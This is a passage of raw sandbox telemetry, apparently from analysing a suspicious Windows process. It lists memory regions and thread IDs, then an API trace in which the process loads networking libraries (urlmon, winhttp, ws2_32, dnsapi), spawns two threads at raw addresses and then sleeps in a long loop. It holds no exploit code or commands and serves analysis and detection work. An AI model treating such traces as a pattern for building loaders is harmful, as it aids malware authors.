0xa672fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a320000" filename = "" Region: id = 4335 start_va = 0x2670000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 4336 start_va = 0x2670000 end_va = 0x2681fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 4337 start_va = 0x2690000 end_va = 0x269dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 4338 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 4339 start_va = 0x9c80000 end_va = 0x9fd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4340 start_va = 0x9fe0000 end_va = 0xa337fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fe0000" filename = "" Region: id = 4341 start_va = 0x9c80000 end_va = 0x9fd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4342 start_va = 0x9fe0000 end_va = 0xa33cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fe0000" filename = "" Region: id = 4343 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 4344 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 4345 start_va = 0x9c80000 end_va = 0x9fdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4346 start_va = 0x9fe0000 end_va = 0xa341fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fe0000" filename = "" Region: id = 4352 start_va = 0xa350000 end_va = 0xa6b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a350000" filename = "" Region: id = 4354 start_va = 0x9c80000 end_va = 0x9fe6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4358 start_va = 0x9ff0000 end_va = 0xa358fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ff0000" filename = "" Region: id = 4359 start_va = 0x9c80000 end_va = 0x9febfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4361 start_va = 0x9ff0000 end_va = 0xa35dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ff0000" filename = "" Region: id = 4362 start_va = 0xa360000 end_va = 0xa6d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a360000" filename = "" Region: id = 4366 start_va = 0x9c80000 end_va = 0x9ff2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4367 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 4368 start_va = 0xa000000 end_va = 0xa375fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a000000" filename = "" Region: id = 4369 start_va = 0x9c80000 end_va = 0x9ff7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4370 start_va = 0xa000000 end_va = 0xa37afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a000000" filename = "" Region: id = 4371 start_va = 0x9c80000 end_va = 0x9ffcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4372 start_va = 0xa000000 end_va = 0xa379fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a000000" filename = "" Region: id = 4429 start_va = 0x2670000 end_va = 0x2670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 4982 start_va = 0x2630000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 4983 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 4984 start_va = 0x2630000 end_va = 0x263dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002630000" filename = "" Region: id = 5003 start_va = 0x2630000 end_va = 0x2631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 5004 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 5037 start_va = 0x2650000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 5038 start_va = 0x2660000 end_va = 0x266dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 5039 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 5040 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 5041 start_va = 0x2650000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 5042 start_va = 0x2660000 end_va = 0x266dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 5043 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 5044 start_va = 0x2650000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 5045 start_va = 0x2660000 end_va = 0x266dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 5046 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 5047 start_va = 0x2650000 end_va = 0x2650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 5048 start_va = 0x2660000 end_va = 0x2759fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 5124 start_va = 0x2650000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 5126 start_va = 0x2660000 end_va = 0x266dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 5127 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 5136 start_va = 0x2650000 end_va = 0x265dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Thread: id = 3 os_tid = 0xda0 Thread: id = 4 os_tid = 0xd40 Thread: id = 5 os_tid = 0xd38 Thread: id = 6 os_tid = 0x9dc Thread: id = 7 os_tid = 0x9ac Thread: id = 8 os_tid = 0x9a4 Thread: id = 9 os_tid = 0x62c Thread: id = 10 os_tid = 0x6cc Thread: id = 11 os_tid = 0x6c4 Thread: id = 12 os_tid = 0x54c Thread: id = 13 os_tid = 0x5e8 Thread: id = 14 os_tid = 0x7ec Thread: id = 15 os_tid = 0x5b0 Thread: id = 16 os_tid = 0x320 Thread: id = 17 os_tid = 0x594 Thread: id = 18 os_tid = 0x588 Thread: id = 19 os_tid = 0x4b8 Thread: id = 20 os_tid = 0x4b4 Thread: id = 21 os_tid = 0x434 Thread: id = 22 os_tid = 0x7e4 Thread: id = 23 os_tid = 0x5dc Thread: id = 24 os_tid = 0x544 Thread: id = 25 os_tid = 0x4e4 Thread: id = 26 os_tid = 0x4cc Thread: id = 27 os_tid = 0x4c8 Thread: id = 28 os_tid = 0x4c4 Thread: id = 29 os_tid = 0x4a8 Thread: id = 30 os_tid = 0x4a4 Thread: id = 31 os_tid = 0x4a0 Thread: id = 32 os_tid = 0x404 Thread: id = 33 os_tid = 0x288 Thread: id = 34 os_tid = 0x168 Thread: id = 35 os_tid = 0x148 Thread: id = 36 os_tid = 0x180 Thread: id = 37 os_tid = 0x394 Thread: id = 38 os_tid = 0x13c Thread: id = 39 os_tid = 0xea0 [0095.541] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77800000 [0095.543] GetProcAddress (hModule=0x77800000, lpProcName="RtlExitUserThread") returned 0x77846930 [0095.545] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x97d0000 [0095.730] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10) returned 0x97d12f0 [0095.730] LoadLibraryA (lpLibFileName="user32") returned 0x775e0000 [0095.731] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x10 [0095.749] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0095.751] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x97d12f0 [0095.751] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefefb0000 [0095.752] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x12 [0095.752] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0095.752] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10) returned 0x97d12f0 [0095.753] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefdb20000 [0095.754] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x10 [0095.754] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0xf) returned 0x97d12f0 [0095.754] LoadLibraryA (lpLibFileName="ole32") returned 0x7feff2f0000 [0095.755] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0xf [0095.755] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0095.755] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x11) returned 0x97d12f0 [0095.755] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef5a80000 [0096.250] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x11 [0096.250] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0096.250] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10) returned 0x97d12f0 [0096.250] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7feffac0000 [0096.251] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x10 [0096.251] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0096.251] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10) returned 0x97d12f0 [0096.251] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefce60000 [0096.261] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x10 [0096.261] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0096.261] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x11) returned 0x97d12f0 [0096.261] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefdee0000 [0096.261] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x11 [0096.262] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0096.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3a13ca4, lpParameter=0x27a0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1500 [0096.264] CloseHandle (hObject=0x1500) returned 1 [0096.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3a13d80, lpParameter=0x27a0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1500 [0096.265] CloseHandle (hObject=0x1500) returned 1 [0096.265] Sleep (dwMilliseconds=0xa) [0096.285] Sleep (dwMilliseconds=0xa) [0096.295] Sleep (dwMilliseconds=0xa) [0096.310] Sleep (dwMilliseconds=0xa) [0096.326] Sleep (dwMilliseconds=0xa) [0096.342] Sleep (dwMilliseconds=0xa) [0096.358] Sleep (dwMilliseconds=0xa) [0096.373] Sleep (dwMilliseconds=0xa) [0096.391] Sleep (dwMilliseconds=0xa) [0096.404] Sleep (dwMilliseconds=0xa) [0096.420] Sleep (dwMilliseconds=0xa) [0096.435] Sleep (dwMilliseconds=0xa) [0096.452] Sleep (dwMilliseconds=0xa) [0096.467] Sleep (dwMilliseconds=0xa) [0096.482] Sleep (dwMilliseconds=0xa) [0096.497] Sleep (dwMilliseconds=0xa) [0096.514] Sleep (dwMilliseconds=0xa) [0096.529] Sleep (dwMilliseconds=0xa) [0096.546] Sleep (dwMilliseconds=0xa) [0096.560] Sleep (dwMilliseconds=0xa) [0096.576] Sleep (dwMilliseconds=0xa) [0096.593] Sleep (dwMilliseconds=0xa) [0096.607] Sleep (dwMilliseconds=0xa) [0096.625] Sleep (dwMilliseconds=0xa) [0096.638] Sleep (dwMilliseconds=0xa) [0096.654] Sleep (dwMilliseconds=0xa) [0096.669] Sleep (dwMilliseconds=0xa) [0096.688] Sleep (dwMilliseconds=0xa) [0096.701] Sleep (dwMilliseconds=0xa) [0096.716] Sleep (dwMilliseconds=0xa) [0096.732] Sleep (dwMilliseconds=0xa) [0096.748] Sleep (dwMilliseconds=0xa) [0096.763] Sleep (dwMilliseconds=0xa) [0096.779] Sleep (dwMilliseconds=0xa) [0096.794] Sleep (dwMilliseconds=0xa) [0096.809] Sleep (dwMilliseconds=0xa) [0096.825] Sleep (dwMilliseconds=0xa) [0096.841] Sleep (dwMilliseconds=0xa) [0096.857] Sleep (dwMilliseconds=0xa) [0096.893] Sleep (dwMilliseconds=0xa) [0096.903] Sleep (dwMilliseconds=0xa) [0096.941] Sleep (dwMilliseconds=0xa) [0096.977] Sleep (dwMilliseconds=0xa) [0096.982] Sleep (dwMilliseconds=0xa) [0096.997] Sleep (dwMilliseconds=0xa) [0097.012] Sleep (dwMilliseconds=0xa) [0097.029] Sleep (dwMilliseconds=0xa) [0097.055] Sleep (dwMilliseconds=0xa) [0097.060] Sleep (dwMilliseconds=0xa) [0097.078] Sleep (dwMilliseconds=0xa) [0097.117] Sleep (dwMilliseconds=0xa) [0097.154] Sleep (dwMilliseconds=0xa) [0097.200] Sleep (dwMilliseconds=0xa) [0097.236] Sleep (dwMilliseconds=0xa) [0097.256] Sleep (dwMilliseconds=0xa) [0097.262] Sleep (dwMilliseconds=0xa) [0097.278] Sleep (dwMilliseconds=0xa) [0097.294] Sleep (dwMilliseconds=0xa) [0097.309] Sleep (dwMilliseconds=0xa) [0097.325] Sleep (dwMilliseconds=0xa) [0097.341] Sleep (dwMilliseconds=0xa) [0097.356] Sleep (dwMilliseconds=0xa) [0097.394] Sleep (dwMilliseconds=0xa) [0097.441] Sleep (dwMilliseconds=0xa) [0097.449] Sleep (dwMilliseconds=0xa) [0097.466] Sleep (dwMilliseconds=0xa) [0097.480] Sleep (dwMilliseconds=0xa) [0097.496] Sleep (dwMilliseconds=0xa) [0097.513] Sleep (dwMilliseconds=0xa) [0097.528] Sleep (dwMilliseconds=0xa) [0097.563] Sleep (dwMilliseconds=0xa) [0097.616] Sleep (dwMilliseconds=0xa) [0097.621] Sleep (dwMilliseconds=0xa) [0097.637] Sleep (dwMilliseconds=0xa) [0097.652] Sleep (dwMilliseconds=0xa) [0097.668] Sleep (dwMilliseconds=0xa) [0097.684] Sleep (dwMilliseconds=0xa) [0097.723] Sleep (dwMilliseconds=0xa) [0097.763] Sleep (dwMilliseconds=0xa) [0097.782] Sleep (dwMilliseconds=0xa) [0097.793] Sleep (dwMilliseconds=0xa) [0097.808] Sleep (dwMilliseconds=0xa) [0097.824] Sleep (dwMilliseconds=0xa) [0097.840] Sleep (dwMilliseconds=0xa) [0097.859] Sleep (dwMilliseconds=0xa) [0097.895] Sleep (dwMilliseconds=0xa) [0097.928] Sleep (dwMilliseconds=0xa) [0097.952] Sleep (dwMilliseconds=0xa) [0097.965] Sleep (dwMilliseconds=0xa) [0097.980] Sleep (dwMilliseconds=0xa) [0097.995] Sleep (dwMilliseconds=0xa) [0098.011] Sleep (dwMilliseconds=0xa) [0098.027] Sleep (dwMilliseconds=0xa) [0098.045] Sleep (dwMilliseconds=0xa) [0098.058] Sleep (dwMilliseconds=0xa) [0098.096] Sleep (dwMilliseconds=0xa) [0098.128] Sleep (dwMilliseconds=0xa) [0098.137] Sleep (dwMilliseconds=0xa) [0098.152] Sleep (dwMilliseconds=0xa) [0098.167] Sleep (dwMilliseconds=0xa) [0098.182] Sleep (dwMilliseconds=0xa) [0098.199] Sleep (dwMilliseconds=0xa) [0098.216] Sleep (dwMilliseconds=0xa) [0098.230] Sleep (dwMilliseconds=0xa) [0098.280] Sleep (dwMilliseconds=0xa) [0098.300] Sleep (dwMilliseconds=0xa) [0098.307] Sleep (dwMilliseconds=0xa) [0098.323] Sleep (dwMilliseconds=0xa) [0098.338] Sleep (dwMilliseconds=0xa) [0098.354] Sleep (dwMilliseconds=0xa) [0098.370] Sleep (dwMilliseconds=0xa) [0098.385] Sleep (dwMilliseconds=0xa) [0098.401] Sleep (dwMilliseconds=0xa) [0098.449] Sleep (dwMilliseconds=0xa) [0098.471] Sleep (dwMilliseconds=0xa) [0098.479] Sleep (dwMilliseconds=0xa) [0098.495] Sleep (dwMilliseconds=0xa) [0098.511] Sleep (dwMilliseconds=0xa) [0098.526] Sleep (dwMilliseconds=0xa) [0098.543] Sleep (dwMilliseconds=0xa) [0098.557] Sleep (dwMilliseconds=0xa) [0098.572] Sleep (dwMilliseconds=0xa) [0098.627] Sleep (dwMilliseconds=0xa) [0098.654] Sleep (dwMilliseconds=0xa) [0098.666] Sleep (dwMilliseconds=0xa) [0098.682] Sleep (dwMilliseconds=0xa) [0098.697] Sleep (dwMilliseconds=0xa) [0098.713] Sleep (dwMilliseconds=0xa) [0098.732] Sleep (dwMilliseconds=0xa) [0098.744] Sleep (dwMilliseconds=0xa) [0098.760] Sleep (dwMilliseconds=0xa) [0098.806] Sleep (dwMilliseconds=0xa) [0098.823] Sleep (dwMilliseconds=0xa) [0098.839] Sleep (dwMilliseconds=0xa) [0098.853] Sleep (dwMilliseconds=0xa) [0098.906] Sleep (dwMilliseconds=0xa) [0098.915] Sleep (dwMilliseconds=0xa) [0098.963] Sleep (dwMilliseconds=0xa) [0098.978] Sleep (dwMilliseconds=0xa) [0098.993] Sleep (dwMilliseconds=0xa) [0099.009] Sleep (dwMilliseconds=0xa) [0099.025] Sleep (dwMilliseconds=0xa) [0099.041] Sleep (dwMilliseconds=0xa) [0099.056] Sleep (dwMilliseconds=0xa) [0099.074] Sleep (dwMilliseconds=0xa) [0099.118] Sleep (dwMilliseconds=0xa) [0099.134] Sleep (dwMilliseconds=0xa) [0099.150] Sleep (dwMilliseconds=0xa) [0099.165] Sleep (dwMilliseconds=0xa) [0099.181] Sleep (dwMilliseconds=0xa) [0099.196] Sleep (dwMilliseconds=0xa) [0099.212] Sleep (dwMilliseconds=0xa) [0099.228] Sleep (dwMilliseconds=0xa) [0099.275] Sleep (dwMilliseconds=0xa) [0099.294] Sleep (dwMilliseconds=0xa) [0099.305] Sleep (dwMilliseconds=0xa) [0099.321] Sleep (dwMilliseconds=0xa) [0099.337] Sleep (dwMilliseconds=0xa) [0099.352] Sleep (dwMilliseconds=0xa) [0099.368] Sleep (dwMilliseconds=0xa) [0099.384] Sleep (dwMilliseconds=0xa) [0099.430] Sleep (dwMilliseconds=0xa) [0099.449] Sleep (dwMilliseconds=0xa) [0099.462] Sleep (dwMilliseconds=0xa) [0099.477] Sleep (dwMilliseconds=0xa) [0099.575] Sleep (dwMilliseconds=0xa) [0099.586] Sleep (dwMilliseconds=0xa) [0099.602] Sleep (dwMilliseconds=0xa) [0099.628] Sleep (dwMilliseconds=0xa) [0099.665] Sleep (dwMilliseconds=0xa) [0099.685] Sleep (dwMilliseconds=0xa) [0099.695] Sleep (dwMilliseconds=0xa) [0099.711] Sleep (dwMilliseconds=0xa) [0099.727] Sleep (dwMilliseconds=0xa) [0099.742] Sleep (dwMilliseconds=0xa) [0099.761] Sleep (dwMilliseconds=0xa) [0099.774] Sleep (dwMilliseconds=0xa) [0099.790] Sleep (dwMilliseconds=0xa) [0099.823] Sleep (dwMilliseconds=0xa) [0099.867] Sleep (dwMilliseconds=0xa) [0099.884] Sleep (dwMilliseconds=0xa) [0099.899] Sleep (dwMilliseconds=0xa) [0099.914] Sleep (dwMilliseconds=0xa) [0099.944] Sleep (dwMilliseconds=0xa) [0099.963] Sleep (dwMilliseconds=0xa) [0099.976] Sleep (dwMilliseconds=0xa) [0100.025] Sleep (dwMilliseconds=0xa) [0100.046] Sleep (dwMilliseconds=0xa) [0100.054] Sleep (dwMilliseconds=0xa) [0100.070] Sleep (dwMilliseconds=0xa) [0100.086] Sleep (dwMilliseconds=0xa) [0100.102] Sleep (dwMilliseconds=0xa) [0100.117] Sleep (dwMilliseconds=0xa) [0100.133] Sleep (dwMilliseconds=0xa) [0100.152] Sleep (dwMilliseconds=0xa) [0100.195] Sleep (dwMilliseconds=0xa) [0100.216] Sleep (dwMilliseconds=0xa) [0100.226] Sleep (dwMilliseconds=0xa) [0100.243] Sleep (dwMilliseconds=0xa) [0100.257] Sleep (dwMilliseconds=0xa) [0100.273] Sleep (dwMilliseconds=0xa) [0100.288] Sleep (dwMilliseconds=0xa) [0100.304] Sleep (dwMilliseconds=0xa) [0100.351] Sleep (dwMilliseconds=0xa) [0100.373] Sleep (dwMilliseconds=0xa) [0100.383] Sleep (dwMilliseconds=0xa) [0100.397] Sleep (dwMilliseconds=0xa) [0100.413] Sleep (dwMilliseconds=0xa) [0100.429] Sleep (dwMilliseconds=0xa) [0100.444] Sleep (dwMilliseconds=0xa) [0100.461] Sleep (dwMilliseconds=0xa) [0100.477] Sleep (dwMilliseconds=0xa) [0100.522] Sleep (dwMilliseconds=0xa) [0100.543] Sleep (dwMilliseconds=0xa) [0100.553] Sleep (dwMilliseconds=0xa) [0100.570] Sleep (dwMilliseconds=0xa) [0100.585] Sleep (dwMilliseconds=0xa) [0100.653] Sleep (dwMilliseconds=0xa) [0100.664] Sleep (dwMilliseconds=0xa) [0100.679] Sleep (dwMilliseconds=0xa) [0100.756] Sleep (dwMilliseconds=0xa) [0100.774] Sleep (dwMilliseconds=0xa) [0100.789] Sleep (dwMilliseconds=0xa) [0100.804] Sleep (dwMilliseconds=0xa) [0100.819] Sleep (dwMilliseconds=0xa) [0100.836] Sleep (dwMilliseconds=0xa) [0100.850] Sleep (dwMilliseconds=0xa) [0100.866] Sleep (dwMilliseconds=0xa) [0100.881] Sleep (dwMilliseconds=0xa) [0100.929] Sleep (dwMilliseconds=0xa) [0100.943] Sleep (dwMilliseconds=0xa) [0100.959] Sleep (dwMilliseconds=0xa) [0100.988] Sleep (dwMilliseconds=0xa) [0100.990] Sleep (dwMilliseconds=0xa) [0101.006] Sleep (dwMilliseconds=0xa) [0101.026] Sleep (dwMilliseconds=0xa) [0101.039] Sleep (dwMilliseconds=0xa) [0101.090] Sleep (dwMilliseconds=0xa) [0101.099] Sleep (dwMilliseconds=0xa) [0101.116] Sleep (dwMilliseconds=0xa) [0101.131] Sleep (dwMilliseconds=0xa) [0101.148] Sleep (dwMilliseconds=0xa) [0101.162] Sleep (dwMilliseconds=0xa) [0101.178] Sleep (dwMilliseconds=0xa) [0101.193] Sleep (dwMilliseconds=0xa) [0101.240] Sleep (dwMilliseconds=0xa) [0101.255] Sleep (dwMilliseconds=0xa) [0101.271] Sleep (dwMilliseconds=0xa) [0101.287] Sleep (dwMilliseconds=0xa) [0101.303] Sleep (dwMilliseconds=0xa) [0101.318] Sleep (dwMilliseconds=0xa) [0101.334] Sleep (dwMilliseconds=0xa) [0101.352] Sleep (dwMilliseconds=0xa) [0101.398] Sleep (dwMilliseconds=0xa) [0101.416] Sleep (dwMilliseconds=0xa) [0101.428] Sleep (dwMilliseconds=0xa) [0101.443] Sleep (dwMilliseconds=0xa) [0101.459] Sleep (dwMilliseconds=0xa) [0101.474] Sleep (dwMilliseconds=0xa) [0101.490] Sleep (dwMilliseconds=0xa) [0101.505] Sleep (dwMilliseconds=0xa) [0101.523] Sleep (dwMilliseconds=0xa) [0101.567] Sleep (dwMilliseconds=0xa) [0101.588] Sleep (dwMilliseconds=0xa) [0101.599] Sleep (dwMilliseconds=0xa) [0101.614] Sleep (dwMilliseconds=0xa) [0101.630] Sleep (dwMilliseconds=0xa) [0101.658] Sleep (dwMilliseconds=0xa) [0101.661] Sleep (dwMilliseconds=0xa) [0101.681] Sleep (dwMilliseconds=0xa) [0101.692] Sleep (dwMilliseconds=0xa) [0101.743] Sleep (dwMilliseconds=0xa) [0101.755] Sleep (dwMilliseconds=0xa) [0101.771] Sleep (dwMilliseconds=0xa) [0101.786] Sleep (dwMilliseconds=0xa) [0101.802] Sleep (dwMilliseconds=0xa) [0101.817] Sleep (dwMilliseconds=0xa) [0101.833] Sleep (dwMilliseconds=0xa) [0101.848] Sleep (dwMilliseconds=0xa) [0101.896] Sleep (dwMilliseconds=0xa) [0101.911] Sleep (dwMilliseconds=0xa) [0101.927] Sleep (dwMilliseconds=0xa) [0101.942] Sleep (dwMilliseconds=0xa) [0101.958] Sleep (dwMilliseconds=0xa) [0101.994] Sleep (dwMilliseconds=0xa) [0102.005] Sleep (dwMilliseconds=0xa) [0102.146] Sleep (dwMilliseconds=0xa) [0102.160] Sleep (dwMilliseconds=0xa) [0102.176] Sleep (dwMilliseconds=0xa) [0102.191] Sleep (dwMilliseconds=0xa) [0102.207] Sleep (dwMilliseconds=0xa) [0102.223] Sleep (dwMilliseconds=0xa) [0102.273] Sleep (dwMilliseconds=0xa) [0102.285] Sleep (dwMilliseconds=0xa) [0102.301] Sleep (dwMilliseconds=0xa) [0102.317] Sleep (dwMilliseconds=0xa) [0102.332] Sleep (dwMilliseconds=0xa) [0102.347] Sleep (dwMilliseconds=0xa) [0102.363] Sleep (dwMilliseconds=0xa) [0102.379] Sleep (dwMilliseconds=0xa) [0102.425] Sleep (dwMilliseconds=0xa) [0102.442] Sleep (dwMilliseconds=0xa) [0102.457] Sleep (dwMilliseconds=0xa) [0102.472] Sleep (dwMilliseconds=0xa) [0102.489] Sleep (dwMilliseconds=0xa) [0102.504] Sleep (dwMilliseconds=0xa) [0102.520] Sleep (dwMilliseconds=0xa) [0102.535] Sleep (dwMilliseconds=0xa) [0102.582] Sleep (dwMilliseconds=0xa) [0102.601] Sleep (dwMilliseconds=0xa) [0102.613] Sleep (dwMilliseconds=0xa) [0102.628] Sleep (dwMilliseconds=0xa) [0102.644] Sleep (dwMilliseconds=0xa) [0102.670] Sleep (dwMilliseconds=0xa) [0102.675] Sleep (dwMilliseconds=0xa) [0102.693] Sleep (dwMilliseconds=0xa) [0102.726] Sleep (dwMilliseconds=0xa) [0102.749] Sleep (dwMilliseconds=0xa) [0102.753] Sleep (dwMilliseconds=0xa) [0102.769] Sleep (dwMilliseconds=0xa) [0102.787] Sleep (dwMilliseconds=0xa) [0102.801] Sleep (dwMilliseconds=0xa) [0102.816] Sleep (dwMilliseconds=0xa) [0102.831] Sleep (dwMilliseconds=0xa) [0102.847] Sleep (dwMilliseconds=0xa) [0102.893] Sleep (dwMilliseconds=0xa) [0102.909] Sleep (dwMilliseconds=0xa) [0102.925] Sleep (dwMilliseconds=0xa) [0102.940] Sleep (dwMilliseconds=0xa) [0102.956] Sleep (dwMilliseconds=0xa) [0102.975] Sleep (dwMilliseconds=0xa) [0102.988] Sleep (dwMilliseconds=0xa) [0103.003] Sleep (dwMilliseconds=0xa) [0103.063] Sleep (dwMilliseconds=0xa) [0103.080] Sleep (dwMilliseconds=0xa) [0103.081] Sleep (dwMilliseconds=0xa) [0103.096] Sleep (dwMilliseconds=0xa) [0103.115] Sleep (dwMilliseconds=0xa) [0103.127] Sleep (dwMilliseconds=0xa) [0103.143] Sleep (dwMilliseconds=0xa) [0103.159] Sleep (dwMilliseconds=0xa) [0103.174] Sleep (dwMilliseconds=0xa) [0103.221] Sleep (dwMilliseconds=0xa) [0103.237] Sleep (dwMilliseconds=0xa) [0103.252] Sleep (dwMilliseconds=0xa) [0103.268] Sleep (dwMilliseconds=0xa) [0103.284] Sleep (dwMilliseconds=0xa) [0103.299] Sleep (dwMilliseconds=0xa) [0103.315] Sleep (dwMilliseconds=0xa) [0103.331] Sleep (dwMilliseconds=0xa) [0103.377] Sleep 